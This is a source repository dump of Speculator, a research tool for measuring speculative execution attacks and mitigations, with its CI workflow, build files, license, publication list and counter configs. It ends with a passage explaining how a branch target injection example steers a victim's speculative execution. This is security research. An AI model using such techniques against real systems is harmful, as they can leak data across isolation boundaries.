├── .github └── workflows │ └── speculator-ci.yml ├── .gitignore ├── CMakeLists.txt ├── LICENSE ├── README.md ├── confs ├── speculator.json.amd.template └── speculator.json.intel.template ├── examples ├── BTI │ ├── README.md │ ├── bti_attacker.asm │ └── bti_victim.asm ├── SPEAR │ ├── architectural │ │ ├── backward_edge │ │ │ └── arch_bwd.asm │ │ └── forward_edge │ │ │ └── arch_fwd.asm │ ├── link_spear.zsh │ ├── run_spear.zsh │ └── speculative │ │ ├── backward_edge │ │ └── spec_bwd.asm │ │ └── forward_edge │ │ └── spec_fwd.asm ├── clflush_in_speculation │ ├── clflush_in_speculation_cached.asm │ └── clflush_in_speculation_uncached.asm ├── corr_issued_and_exec │ ├── corr_issued_and_exec.json │ └── corr_issued_and_exec_slow_lea.asm ├── doubleBTI │ ├── README.md │ ├── dblbti_attacker.asm │ ├── dblbti_attacker.c │ ├── dblbti_victim.asm │ ├── dblbti_victim.c │ └── doubleBTI_POC.zsh ├── mpx │ ├── mpx.asm │ └── spec_length.json ├── nx │ ├── nx.asm │ └── spec_length.json ├── rsb │ ├── rsb_fill_deep_stack.asm │ └── rsb_fill_deep_stack.json ├── speculation_in_speculation │ └── speculation_in_speculation_in_speculation.asm ├── speculation_stopper │ ├── speculation_stopper.asm │ └── speculation_stopper.json ├── syscall_speculation │ ├── syscall_speculation.asm │ ├── syscall_speculation.json │ └── syscall_speculation_baseline.asm ├── v1_various_cond_cycles │ ├── v1_cond_cached.asm │ ├── v1_cond_complex_cached_div.asm │ ├── v1_cond_complex_cached_mul.asm │ ├── v1_cond_complex_register_div.asm │ ├── v1_cond_complex_register_mul.asm │ ├── v1_cond_complex_uncached_div.asm │ ├── v1_cond_complex_uncached_mul.asm │ ├── v1_cond_register.asm │ ├── v1_cond_uncached.asm │ ├── v1_nocond_cached.asm │ ├── v1_nocond_complex_cached_div.asm │ ├── v1_nocond_complex_cached_mul.asm │ ├── v1_nocond_complex_register_div.asm │ ├── v1_nocond_complex_register_mul.asm │ ├── v1_nocond_complex_uncached_div.asm │ ├── v1_nocond_complex_uncached_mul.asm │ ├── v1_nocond_register.asm │ └── v1_nocond_uncached.asm ├── v2_various_uncond_cycles │ ├── v2_uncond_cached.asm │ ├── v2_uncond_register.asm │ └── v2_uncond_uncached.asm └── v4_cycles │ ├── v4_cycles.asm │ └── v4_cycles.json ├── include ├── amd.h ├── config.h.in ├── intel.h └── speculator.h ├── scripts ├── cr_inc_snip.py ├── post-processing-exec.py ├── post-processing.py └── run_test.py ├── speculator.env ├── src ├── CMakeLists.txt └── speculator_monitor.c ├── templates └── x86 │ ├── example.json │ ├── template.asm │ └── template_branch.asm └── tests ├── CMakeLists.txt ├── include └── x86 │ ├── amd.inc │ ├── common.inc.in │ ├── intel.inc │ └── signals.inc └── musl ├── libc.a ├── libc.so ├── libcrypt.a ├── libdl.a ├── libm.a ├── libpthread.a ├── libresolv.a ├── librt.a ├── libutil.a ├── libxnet.a └── musl-gcc.specs /.github/workflows/speculator-ci.yml: -------------------------------------------------------------------------------- 1 | name: Speculator CI 2 | 3 | on: [push] 4 | 5 | jobs: 6 | build: 7 | name: compile-speculator 8 | runs-on: ${{ matrix.os }} 9 | strategy: 10 | matrix: 11 | os: [ubuntu-16.04, ubuntu-18.04, ubuntu-latest] 12 | compiler: [gcc, clang] 13 | steps: 14 | - uses: actions/checkout@v2 15 | 16 | - name: dependencies 17 | run: sudo apt install cmake gcc g++ clang libjson-c-dev libpfm4-dev ninja-build python-sqlalchemy cmake nasm python-numpy zsh 18 | 19 | - name: configure 20 | run: cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" 21 | env: 22 | SPEC_H: ./ 23 | SPEC_B: ./build 24 | SPEC_I: ./install 25 | 26 | - name: compile 27 | run: ninja -C $SPEC_B 28 | env: 29 | SPEC_B: ./build 30 | 31 | - name: install 32 | run: ninja -C $SPEC_B install 33 | env: 34 | SPEC_B: ./build 35 | 36 | - name: load_msr 37 | run: sudo modprobe msr 38 | 39 | - name: Return Stack Buffer example 40 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/rsb_deep_stack $SPEC_H/examples/rsb/rsb_fill_deep_stack.json $SPEC_H/examples/rsb/rsb_fill_deep_stack.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/rsb_deep_stack && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 41 | env: 42 | SPEC_H: ./ 43 | SPEC_B: ./build 44 | SPEC_I: ./install 45 | 46 | - name: Speculation of Nested Branches example 47 | run: cp $SPEC_H/examples/speculation_in_speculation/speculation_in_speculation_in_speculation.asm $SPEC_H/tests && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/speculation_in_speculation_in_speculation.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 48 | env: 49 | SPEC_H: ./ 50 | SPEC_B: ./build 51 | SPEC_I: ./install 52 | 53 | - name: Speculative Execution Across System Calls example 54 | run: cp $SPEC_H/examples/syscall_speculation/syscall_speculation_baseline.asm $SPEC_H/tests && $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/syscall_speculation $SPEC_H/examples/syscall_speculation/syscall_speculation.json $SPEC_H/examples/syscall_speculation/syscall_speculation.asm && cp $SPEC_H/examples/speculation_in_speculation/speculation_in_speculation_in_speculation.asm $SPEC_H/tests && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/syscall_speculation && rm -rf $SPEC_H/tests/syscall_speculation_baseline.asm && rm -rf $SPEC_H/tests/*.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 55 | env: 56 | SPEC_H: ./ 57 | SPEC_B: ./build 58 | SPEC_I: ./install 59 | 60 | - name: Flushing the Cache example 61 | run: cp $SPEC_H/examples/clflush_in_speculation/clflush_in_speculation_cached.asm $SPEC_H/tests/ && cp $SPEC_H/examples/clflush_in_speculation/clflush_in_speculation_uncached.asm $SPEC_H/tests/ && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/clflush_in_speculation_cached.asm $SPEC_H/tests/clflush_in_speculation/clflush_in_speculation_uncached.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 62 | env: 63 | SPEC_H: ./ 64 | SPEC_B: ./build 65 | SPEC_I: ./install 66 | 67 | - name: Speculation Window Size example 68 | run: cp $SPEC_H/examples/v1_various_cond_cycles/*.asm $SPEC_H/tests/ && cp $SPEC_H/examples/v2_various_uncond_cycles/*.asm $SPEC_H/tests/ && $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/v4_cycles $SPEC_H/examples/v4_cycles/v4_cycles.json $SPEC_H/examples/v4_cycles/v4_cycles.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/*.asm $SPEC_H/tests/v4_cycles && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 69 | env: 70 | SPEC_H: ./ 71 | SPEC_B: ./build 72 | SPEC_I: ./install 73 | 74 | - name: Speculation Stopper example 75 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/speculation_stopper $SPEC_H/examples/speculation_stopper/speculation_stopper.json $SPEC_H/examples/speculation_stopper/speculation_stopper.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/speculation_stopper && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 76 | env: 77 | SPEC_H: ./ 78 | SPEC_B: ./build 79 | SPEC_I: ./install 80 | 81 | - name: Execution Only Page example 82 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/nx $SPEC_H/examples/nx/spec_length.json $SPEC_H/examples/nx/nx.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/nx && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 83 | env: 84 | SPEC_H: ./ 85 | SPEC_B: ./build 86 | SPEC_I: ./install 87 | 88 | - name: Memory Protection Extension example 89 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/mpx $SPEC_H/examples/mpx/spec_length.json $SPEC_H/examples/mpx/mpx.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && rm -rf $SPEC_H/tests/mpx && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 90 | env: 91 | SPEC_H: ./ 92 | SPEC_B: ./build 93 | SPEC_I: ./install 94 | 95 | - name: Issued vs Executed uops example 96 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/corr_slow_lea $SPEC_H/examples/corr_issued_and_exec/corr_issued_and_exec.json $SPEC_H/examples/corr_issued_and_exec/corr_issued_and_exec_slow_lea.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/corr_slow_lea && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 97 | env: 98 | SPEC_H: ./ 99 | SPEC_B: ./build 100 | SPEC_I: ./install 101 | - name: SPEAR tests 102 | run: cp $SPEC_H/examples/SPEAR/*/*/*.asm $SPEC_H/tests && zsh $SPEC_H/examples/SPEAR/run_spear.zsh && rm -rf $SPEC_H/tests/*.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 103 | env: 104 | SPEC_H: ./ 105 | SPEC_B: ./build 106 | SPEC_I: ./install 107 | 108 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | perf.data 2 | perf.data.old 3 | perf_test 4 | perf_test_asm 5 | lib/libhelper.a 6 | *.o 7 | speculator.json 8 | speculator.env 9 | tests/*.asm 10 | tests/*.c 11 | tests/*.inc 12 | tests/*.in 13 | -------------------------------------------------------------------------------- /CMakeLists.txt: -------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | cmake_minimum_required (VERSION 3.1) 16 | project (SPECULATOR VERSION 1.2.0 LANGUAGES C ASM) 17 | 18 | cmake_policy(SET CMP0048 NEW) 19 | 20 | include_directories(${CMAKE_CURRENT_SOURCE_DIR}/include) 21 | 22 | message(STATUS "Quering CPU type") 23 | execute_process (COMMAND cat /proc/cpuinfo 24 | COMMAND grep vendor_id 25 | COMMAND head -n 1 26 | COMMAND cut -d " " -f 2 27 | OUTPUT_VARIABLE VENDOR 28 | OUTPUT_STRIP_TRAILING_WHITESPACE) 29 | message(STATUS "CPU Detected -- ${VENDOR}") 30 | 31 | IF (NOT EXISTS speculator.json) 32 | IF(${VENDOR} STREQUAL "AuthenticAMD") 33 | configure_file(${CMAKE_CURRENT_SOURCE_DIR}/confs/speculator.json.amd.template ${CMAKE_CURRENT_SOURCE_DIR}/speculator.json @ONLY) 34 | message (STATUS "Generated default AMD counters config file") 35 | ELSEIF(${VENDOR} STREQUAL "GenuineIntel") 36 | configure_file(${CMAKE_CURRENT_SOURCE_DIR}/confs/speculator.json.intel.template ${CMAKE_CURRENT_SOURCE_DIR}/speculator.json @ONLY) 37 | message (STATUS "Generated default Intel counters config file") 38 | ELSE() 39 | message(FATAL_ERROR "CPU not yet supported: ${VENDOR}") 40 | ENDIF() 41 | ENDIF() 42 | 43 | configure_file(speculator.json speculator.json @ONLY) 44 | 45 | IF (${VENDOR} STREQUAL "AuthenticAMD") 46 | message(STATUS "Generating templates header for " ${VENDOR}) 47 | execute_process( 48 | COMMAND ${CMAKE_COMMAND} -E create_symlink 49 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/common.inc.in 50 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/common.inc.in 51 | ) 52 | execute_process( 53 | COMMAND ${CMAKE_COMMAND} -E create_symlink 54 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/amd.inc 55 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/pmc.inc 56 | ) 57 | execute_process( 58 | COMMAND ${CMAKE_COMMAND} -E create_symlink 59 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/signals.inc 60 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/signals.inc 61 | ) 62 | 63 | ELSEIF (${VENDOR} STREQUAL "GenuineIntel") 64 | message(STATUS "Generating templates header for " ${VENDOR}) 65 | execute_process( 66 | COMMAND ${CMAKE_COMMAND} -E create_symlink 67 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/common.inc.in 68 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/common.inc.in 69 | ) 70 | execute_process( 71 | COMMAND ${CMAKE_COMMAND} -E create_symlink 72 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/intel.inc 73 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/pmc.inc 74 | ) 75 | execute_process( 76 | COMMAND ${CMAKE_COMMAND} -E create_symlink 77 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/signals.inc 78 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/signals.inc 79 | ) 80 | 81 | ENDIF() 82 | 83 | # Adding CMake Clean target 84 | if(${CMAKE_GENERATOR} STREQUAL "Ninja") 85 | add_custom_target(Clean COMMAND ninja clean) 86 | else() 87 | add_custom_target(Clean COMMAND ${MAKE} clean) 88 | endif() 89 | 90 | add_custom_command(TARGET Clean COMMAND rm -f 91 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/*.in ${CMAKE_CURRENT_SOURCE_DIR}/tests/*.inc ) 92 | 93 | 94 | add_subdirectory(tests) 95 | add_subdirectory(src) 96 | 97 | install(FILES speculator.json 98 | DESTINATION . ) 99 | 100 | install(DIRECTORY "scripts" 101 | DESTINATION . 102 | USE_SOURCE_PERMISSIONS) 103 | 104 | install(DIRECTORY 105 | DESTINATION "results") 106 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![](https://github.com/ibm-research/speculator/workflows/Speculator%20CI/badge.svg)](https://github.com/ibm-research/speculator/actions) 2 | # Speculator 3 | 4 | Tool to Analyze Speculative Execution Attacks and Mitigations 5 | 6 | ## QuickStart 7 | A quickstart guide can be found [here](https://github.com/ibm-research/speculator/wiki/Quick_Start). 8 | In the guide, you can find information and commands on how to build and use speculator. 9 | 10 | For more examples please refer to [here](https://github.com/ibm-research/speculator/wiki/Examples) 11 | 12 | For more infomation please refer to the [wiki](https://github.com/ibm-research/speculator/wiki). 13 | 14 | ## Branches 15 | `develop`: contains the lastest version of Speculator (which might be not fully functional) 16 | 17 | `master`: it is the stable branch where the releases will be published 18 | 19 | `others`: the other branches represent currently developed features 20 | 21 | ## Publications 22 | * [1] A. Mambretti, A. Sandulescu, M. Neugschwandtner, A. Sorniotti, A. Kurmus 23 | Two Methods for Exploiting Speculative Control Flow Hijacks. 24 | 13th USENIX Workshop on Offensive Technologies (WOOT), Santa Clara, CA, USA, August 2019 25 | 26 | * [2] A. Mambretti, M. Neugschwandtner, A. Sorniotti, E. Kirda, W. Robertson, A. Kurmus 27 | Speculator: A Tool to Analyze Speculative Execution Attacks and Mitigations 28 | 35th Annual Computer Security Applications Conference (ACSAC), San Juan, Puerto Rico, December 2019 29 | 30 | * [3] A. Mambretti, P. Convertini, A. Sorniotti, A. Sandulescu, E. Kirda, A. Kurmus 31 | GhostBuster: understanding and overcoming the pitfalls of transient execution vulnerability checkers 32 | 28th IEEE International Conference on Software Analysis, Evolution and Reengineering (SANER), Honolulu, Hawaii, March 2021 33 | 34 | * [4] A. Mambretti, A. Sandulescu, A. Sorniotti, W. Robertson, E. Kirda, A. Kurmus 35 | Bypassing memory safety mechanisms through speculative control flow hijacking 36 | 6th IEEE European Symposium on Security and Privacy (EuroSP), Vienna, Austria, September 2021 37 | 38 | ### Git flow 39 | This repository follows the [git-flow][git-flow] branching model. Make sure to read and 40 | follow that model. [AVH git extension][git-flow-avh] makes things much easier to handle, 41 | therefore everyone is invited to check them out. 42 | 43 | 44 | [git-flow]: http://nvie.com/posts/a-successful-git-branching-model/ 45 | [git-flow-avh]: https://github.com/petervanderdoes/gitflow/ 46 | -------------------------------------------------------------------------------- /confs/speculator.json.amd.template: -------------------------------------------------------------------------------- 1 | { 2 | "victim": { 3 | "0": { 4 | "name" : "DIV_OP_COUNT", 5 | "description" : "NONE", 6 | "mask" : "" 7 | }, 8 | 9 | "1": { 10 | "name" : "RETIRED_UOPS", 11 | "description" : "NONE", 12 | "mask" : "" 13 | }, 14 | 15 | "2": { 16 | "name" : "PERF_COUNT_SW_CONTEXT_SWITCHES", 17 | "description" : "NONE", 18 | "mask" : "" 19 | }, 20 | 21 | "3": { 22 | "name" : "RETIRED_BRANCH_INSTRUCTIONS_MISPREDICTED", 23 | "description" : "NONE", 24 | "mask" : "" 25 | } 26 | }, 27 | 28 | "attacker": { 29 | "0": { 30 | "name" : "DIV_OP_COUNT", 31 | "description" : "NONE", 32 | "mask" : "" 33 | }, 34 | 35 | "1": { 36 | "name" : "RETIRED_UOPS", 37 | "description" : "NONE", 38 | "mask" : "" 39 | }, 40 | 41 | "2": { 42 | "name" : "PERF_COUNT_SW_CONTEXT_SWITCHES", 43 | "description" : "NONE", 44 | "mask" : "" 45 | }, 46 | 47 | "3": { 48 | "name" : "RETIRED_BRANCH_INSTRUCTIONS_MISPREDICTED", 49 | "description" : "NONE", 50 | "mask" : "" 51 | } 52 | } 53 | } 54 | 55 | -------------------------------------------------------------------------------- /confs/speculator.json.intel.template: -------------------------------------------------------------------------------- 1 | { 2 | "victim": { 3 | "0": { 4 | "name" : "LD_BLOCKS", 5 | "description" : "NONE", 6 | "mask" : "STORE_FORWARD" 7 | }, 8 | 9 | "1": { 10 | "name" : "UOPS_EXECUTED", 11 | "description" : "NONE", 12 | "mask" : "CORE" 13 | }, 14 | 15 | "2": { 16 | "name" : "BR_MISP_RETIRED", 17 | "description" : "NONE", 18 | "mask" : "ALL_BRANCHES" 19 | }, 20 | 21 | "3": { 22 | "name" : "UOPS_ISSUED", 23 | "description" : "NONE", 24 | "mask" : "SINGLE_MUL" 25 | } 26 | }, 27 | 28 | "attacker": { 29 | "0": { 30 | "name" : "LD_BLOCKS", 31 | "description" : "NONE", 32 | "mask" : "STORE_FORWARD" 33 | }, 34 | 35 | "1": { 36 | "name" : "BR_MISP_RETIRED", 37 | "description" : "NONE", 38 | "mask" : "NEAR_TAKEN" 39 | }, 40 | 41 | "2": { 42 | "name" : "BR_MISP_RETIRED", 43 | "description" : "NONE", 44 | "mask" : "ALL_BRANCHES" 45 | }, 46 | 47 | "3": { 48 | "name" : "BR_MISP_RETIRED", 49 | "description" : "NONE", 50 | "mask" : "CONDITIONAL" 51 | } 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /examples/BTI/README.md: -------------------------------------------------------------------------------- 1 | # BTI 2 | This test provides an example of how Branch Target Injection (BTI) can be performed 3 | using Speculator. 4 | 5 | `Victim` performs an indirect call to a "correct" location that simply return and exit. It contains 6 | three other functions (verify, verify2, verify3) that contain speculative execution markers. 7 | 8 | `verify` contains **1** LD_BLOCK.STORE_FORWARD 9 | `verify2` contains **3** LD_BLOCK.STORE_FORWARD 10 | `verify3` contains **6** LD_BLOCK.STORE_FORWARD 11 | 12 | These functions are never called in the victim context . In fact, if executed 13 | as a stand-alone program victim does not trigger any marker of type 14 | LD_BLOCK.STORE_FORWARD. 15 | The attacker instead, performs the same exact sequence of 16 | calls that are performed in the victim but with a specific target multiple 17 | times. This will force in the branch history buffer the target we want the 18 | victim to be hijacked to. 19 | If the attacker is run just before the victim on a co-located thread, the 20 | speculative execution triggered by the indirect call should be re-direct to one 21 | of the verify targets based 